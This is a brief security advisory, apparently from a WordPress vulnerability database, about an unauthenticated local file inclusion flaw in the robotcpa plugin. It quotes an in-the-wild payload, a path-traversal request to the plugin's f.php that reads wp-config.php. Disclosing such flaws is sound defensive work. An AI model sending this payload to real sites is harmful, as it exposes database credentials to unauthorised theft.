The robotcpa WordPress plugin was affected by an Unauthenticated Local File Inclusion security vulnerability.
This issue has been seen exploited in the wild with the following payload: http://www.example.com/wp-content/plugins/robotcpa/f.php?l=..%2F..%2F..%2Fwp-config.php